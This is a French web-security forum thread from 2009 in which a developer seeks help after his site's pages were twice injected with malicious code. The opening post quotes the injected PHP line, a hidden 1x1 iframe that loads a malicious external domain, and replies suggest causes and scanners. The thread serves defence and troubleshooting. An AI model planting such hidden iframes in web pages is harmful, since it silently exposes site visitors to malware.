Site Web Contaminé / Internetcountercheck.com - Forums ZATAZ

IPB

Règles du forum

Aide Recherche Membres Calendrier Reporter TUTOZ Outils

Bienvenue invité ( Connexion | Inscription )

Forums ZATAZ > Logiciels, OS, Internet & Sécurité > VIRUS : Aide et conseils sur les malwares (vers, trojans, spywares, hijack)

Reply to this topic

Start new topic

Site Web Contaminé / Internetcountercheck.com

Manu Voir le profil	May 27 2009, 04:40 PM Message #1
Nouveau membre Groupe : ZATAZien Messages : 3 Inscrit : 27-May 09 Membre n^o 8,795	Bonjour; Je suis WebDeveloppeur et j'ai, dans le cadre de mon travail, à m'occuper d'un site Web qui s'est fait contaminer pour la deuxième fois consécutive... Il y à de ça un mois, le site s'était déjà fait contaminer, un code avait été ajouté à la fin de toutes ses pages "index.html", "index.php", ou encore "main.php" : Code echo "<iframe src=\"http://internetcountercheck.com/?click=393406\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; Le site internetcountercheck.com est bloqué par Chrome et FF (pas testé IE), car considéré comme "suspect" ( http://safebrowsing.clients.google.com/safebro... ) Après la première infection, nous avions changé de serveur (dans le cas où le système aurait été contaminé), et désinfecté tous les fichiers... Maintenant, moins d'un mois après, les fichiers sont à nouveau contaminés... Le site est hébergé sur un serveur dédié. Vu son installation récente (moins d'un mois), je pense que le problème vient d'une faille PHP, ou d'une injection SQL... Mais le site est assez complexe, et étudier le code à la recherche d'une faille serait quasi-impossible... J'ai cherché dans les logs, mais je ne suis pas un expert en sécurité, je ne sais pas quoi chercher... Est-ce que quelqu'un pourrait m'aider ? :-/ Merci d'avance ;-)

CybStup Voir le profil	May 27 2009, 05:37 PM Message #2
Accro à ZATAZ Groupe : Modérateur ZATAZ Messages : 431 Inscrit : 12-January 08 Lieu : Darknet Membre n^o 4,034	Bonjour, Ce domaine est suspendu, il expirera au 20 janvier 2010 ; ça ne signifie pas que vous êtes à l'abri. Cette page devrait vous aider. Et pensez à changer vos identifiants, ça ne mange pas de pain. A bientôt. Ce message a été modifié par CybStup - May 27 2009, 05:37 PM. -------------------- Come crawling faster, Obey your Master, Your fife burns faster, Obey your Master, Master Master of puppets I'm pulling your strings, Twisting your mind and smashing your dreams, Blinding by me you can's see a thing, Just call my name cause i'll hear you scream Master, Master.. До скорой встречи - Пока!

Syrus Voir le profil	May 28 2009, 02:16 PM Message #3
Membre Groupe : ZATAZien Messages : 23 Inscrit : 11-December 08 Membre n^o 7,238	Il ne s'agit pas d'une faille SQL. Il doit y avoir une faille dans le site permettant d'injecter de façon permanente un code javascript (XSS?). Ce code appelant un script malveillant hébergé chez internetcountercheck.com. Le changement de serveur ne suffit pas. Il faut corriger la faille... Pour conseil: Renseignez-vous sur les scanner de vulnérabilités (Acunetix par exemple) qui pourront vous aider à faire un audit de sécurité du site Web.

Manu Voir le profil	Jun 1 2009, 01:31 PM Message #4
Nouveau membre Groupe : ZATAZien Messages : 3 Inscrit : 27-May 09 Membre n^o 8,795	Merci pour vos retours ! J'ai effacé les iframes malveillantes... Les commandes sur la page que tu m'as donnée, CybStup, me renvoyaient une erreur de syntaxe, mais je me suis débrouillé avec grep ^^ Maintenant, ca risque d'etre au client de payer un audit de sécurité... Syrus > Etant donné que les pages PHP et HTML ont été physiquement modifiées, ça ne peut pas être l'oeuvre d'un JS, non ?

thibaut.l Voir le profil	Jun 9 2009, 06:52 AM Message #5
Rompu à ZATAZ Groupe : ZATAZien Messages : 62 Inscrit : 9-December 08 Membre n^o 7,213	Citation ("manu") Etant donné que les pages PHP et HTML ont été physiquement modifiées, ça ne peut pas être l'oeuvre d'un JS, non ? Hélas si! Si ton serveur a l'url rewrite activé , acunetix te sera d'aucune aide, je te conseil d'opté pour un scanneur sous linux comme nikto(mis a jour) par exemple. Ce message a été modifié par thibaut.l - Jun 9 2009, 07:05 AM. -------------------- "No more free bugs" you say. I say that you are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: "knowledge must be free".

Manu Voir le profil	Jun 10 2009, 01:14 PM Message #6
Nouveau membre Groupe : ZATAZien Messages : 3 Inscrit : 27-May 09 Membre n^o 8,795	Comment un JS peut-il modifier des fichiers ? Ô_o

« Sujets plus anciens · VIRUS : Aide et conseils sur les malwares (vers, trojans, spywares, hijack) · Sujets plus récents »

Reply to this topic

Start new topic

1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))

0 membre(s) :

Modes d'affichage: Standard · Passer au mode : Linéaire+ · Passer au mode : Arborescent

Suivre ce sujet · Envoyer ce sujet · Imprimer ce sujet · S'abonner à ce forum

Version bas débit

Nous sommes le : 26th May 2013 - 02:32 AM

Powered By IP.Board © 2013 IPS, Inc.

Licensed to: ZATAZ.com